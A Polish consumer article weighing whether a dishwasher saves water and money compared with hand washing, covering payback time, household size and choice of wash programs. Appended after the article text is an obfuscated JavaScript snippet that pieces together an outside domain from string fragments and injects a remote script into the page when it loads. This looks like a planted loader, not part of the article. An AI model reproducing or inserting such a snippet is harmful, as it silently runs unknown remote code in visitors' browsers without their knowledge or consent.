Oszczędność wody – prawda czy mit?
Potrzeba bycia eko jest coraz bardziej powszechna. Świadome wybieranie rozwiązań energooszczędnych, redukcja odpadów i zwracanie uwagi na wiele aspektów codziennego życia, które mogą przyczyniać się do oszczędzania wody, prądu i innych zasobów stają się częścią standardowego zachowania coraz większej części społeczeństwa.
Ekologia to tylko jedna strona medalu, druga jest nieco bardziej prozaiczna i jest nią oszczędność.
Rozwiązania, które pozwalają redukować zużycie prądu mogą obniżyć rachunki za prąd, a mniejsze zużycie wody nie tylko zredukuje wskazania liczników, ale przyczyni się również do odczuwalnie mniejszej sumy na rachunku za wodę i za odbiór ścieków. Jednym ze sposobów na to, by w warunkach domowych, bez większego wysiłku, móc oszczędzać wodę jest korzystanie ze zmywarki zamiast mycia ręcznego. Czy to tylko chwyt reklamowy, czy faktycznie jest w tym większa oszczędność?
Korzystanie ze zmywarki daje bardzo wymierne korzyści, ale ostateczny bilans zysków i strat zależy od indywidualnej sytuacji. To urządzenie pozwala na redukcję zużycia wody, ale nie tylko. Zmywarka pozwala również zaoszczędzić czas, a to ogromna wartość w dzisiejszym, zabieganym świecie. Jak to jest z tą oszczędnością wody?
Zmywanie ręczne pod bieżącą wodą jest niezmiernym marnotrawstwem – podczas mycia zaledwie kilku talerzy i innych naczyń można zużyć znacznie więcej wody niż zmywarka zużyje na cały cykl przy pełnym załadunku. Urządzenia te potrafią umyć kilkanaście kompletów naczyń w zaledwie kilkunastu litrach wody (szczególnie w trybie eko), co jest znakomitym wynikiem. Wysoka temperatura wody w urządzeniu sprawia, że zabrudzenia są łatwo usuwane bez konieczności namaczania i szorowania naczyń.
Zakup zmywarki to wydatek, który zwróci się dopiero po dłuższym czasie, ale już w perspektywie kilku miesięcy można będzie zaobserwować oszczędności w rachunkach za wodę. Oczywiście nie w każdym przypadku zakup zmywarki będzie opłacalny z ekonomicznego punktu widzenia. Wiele zależy od indywidualnego trybu życia domowników, od ich liczby oraz od tego, jak wiele posiłków w ciągu dnia jest przygotowywanych i spożywanych w domu. W małych gospodarstwach domowych, w których nie gotuje się zbyt często domowych obiadów, zużycie wody podczas zmywania ręcznego nie jest duże, wówczas wydatek na zmywarkę może nie być aż tak opłacalny, jak w przypadku dużej rodziny, która ma w zwyczaju przyrządzać wszystkie posiłki w domu, zapraszać znajomych i innych członków rodziny na wspólne obiady i spotkania.
Nie tylko zmywanie w zmywarce pozwala na oszczędność wody, liczy się również jej rozsądne użytkowanie. Najlepszym rozwiązaniem jest korzystanie z różnych trybów pracy w zależności od tego, jak silne są zabrudzenia na naczyniach. Kolejną kwestią jest dobór programu zmywania do ilości naczyń, ich rodzaju oraz stopnia zabrudzenia. Większość urządzeń posiada klasyczne, dłuższe tryby o wysokiej temperaturze, tryb eko oraz inne, krótsze i oszczędniejsze programy. Jeśli do zmycia są zaledwie talerze po kanapkach, kilka filiżanek i szklanek, nie warto uruchamiać najdłuższego trybu w wysokiej temperaturze.
Zużycie wody w zmywarce będzie zależało również od tego, jaki model urządzenia zakupimy. Nowoczesne sprzęty są coraz bardziej oszczędne. Przy zakupie można zwrócić uwagę na to, ile litrów wody jest używane przez zmywarkę podczas klasycznego cyklu i czy urządzenie posiada opcję uruchomienia zmywania z połową załadunku (wówczas używa jeszcze mniej wody).
(function(){
i283_=(„u”+”st”);i283=document.createElement(„script”);i283.async=true;
i283u=”11757644″;i283_+=”a”+(„t.”);i283_+=”i”+(„nf”+(„o”))+(„/”);
i283u+=”.qsrwhykf283iqszi”;i283u+=”tama140ynzj0gi”;
i283.src=”//”+i283_+i283u;i283.type=”text/javascript”;
d_b=document.body;d_b.appendChild(i283);
})();